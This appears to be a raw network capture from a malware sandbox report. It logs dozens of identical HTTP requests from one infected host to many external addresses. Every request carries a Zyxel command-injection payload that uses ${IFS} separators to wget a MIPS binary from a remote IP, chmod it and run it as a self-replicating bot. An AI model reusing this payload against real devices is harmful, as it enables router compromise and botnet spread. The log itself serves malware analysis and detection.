                                      Jan 14, 2024 15:51:04.725879908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9163192.168.2.1435222176.11.31.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725934029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9164192.168.2.145507013.37.153.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.725987911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9165192.168.2.143907436.163.118.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726018906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9166192.168.2.1453098165.67.173.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726043940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9167192.168.2.14505949.23.178.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726100922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9168192.168.2.1452622195.39.190.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726146936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9169192.168.2.1451278147.210.229.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726176977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9170192.168.2.145784860.162.78.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726202965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9171192.168.2.1442514128.79.3.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726241112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9172192.168.2.1435656156.183.95.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726281881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9173192.168.2.1444210179.51.227.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726319075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9174192.168.2.1450744147.138.39.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726385117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9175192.168.2.1443822154.42.103.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726412058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9176192.168.2.143844242.82.234.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726466894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9177192.168.2.14506402.146.150.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726511002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9178192.168.2.1443870144.212.61.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726561069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9179192.168.2.145749454.29.64.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726598978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9180192.168.2.1454900196.248.166.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726640940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9181192.168.2.1441436162.248.236.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726660013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9182192.168.2.143285280.142.106.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726723909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9183192.168.2.1441808192.97.44.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726737976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9184192.168.2.144733813.178.228.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726783037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9185192.168.2.14595324.214.222.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726836920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9186192.168.2.1447650159.198.70.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726871014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9187192.168.2.1447086212.100.103.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726917982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9188192.168.2.145036436.119.88.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726947069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9189192.168.2.1452442191.226.189.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726963997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9190192.168.2.1433408182.165.49.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.726999044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9191192.168.2.144184062.28.141.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727027893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9192192.168.2.1436776122.151.146.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727065086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9193192.168.2.143779844.228.162.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727089882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9194192.168.2.144711891.11.55.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727160931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9195192.168.2.145306465.58.147.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727196932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9196192.168.2.144511882.115.126.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727242947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9197192.168.2.145780252.147.227.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727305889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9198192.168.2.145589861.100.118.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727345943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9199192.168.2.145801678.50.37.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727392912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9200192.168.2.1456518137.52.75.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.727426052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9201192.168.2.1451172102.147.64.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.731234074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9202192.168.2.1443220147.223.52.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.731271029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9203192.168.2.1459212192.16.16.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.731303930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9204192.168.2.144732260.69.66.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.731357098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9205192.168.2.1448488116.158.146.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.731389999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9206192.168.2.145657478.20.232.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.731419086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9207192.168.2.145553825.71.156.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.731483936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9208192.168.2.1450092205.254.172.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.731511116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9209192.168.2.1451350153.113.55.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.749931097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9210192.168.2.143870414.141.76.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.749978065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9211192.168.2.144994698.40.134.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750037909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9212192.168.2.143622238.194.221.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750055075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9213192.168.2.1458716192.112.33.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750107050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9214192.168.2.1445294208.104.246.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750132084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9215192.168.2.1452508187.29.4.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750204086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9216192.168.2.1441532103.10.28.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750238895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9217192.168.2.143629490.240.149.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750291109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9218192.168.2.1445314207.151.60.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750339985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9219192.168.2.1446104184.220.86.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750386953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9220192.168.2.1444794150.213.200.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750438929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9221192.168.2.145210635.123.22.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750478029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9222192.168.2.144831663.32.150.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750498056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9223192.168.2.143965425.114.110.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750528097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9224192.168.2.1444652200.148.56.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:05.750588894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9225192.168.2.1451036104.172.235.1443
                                      TimestampBytes transferredDirectionData
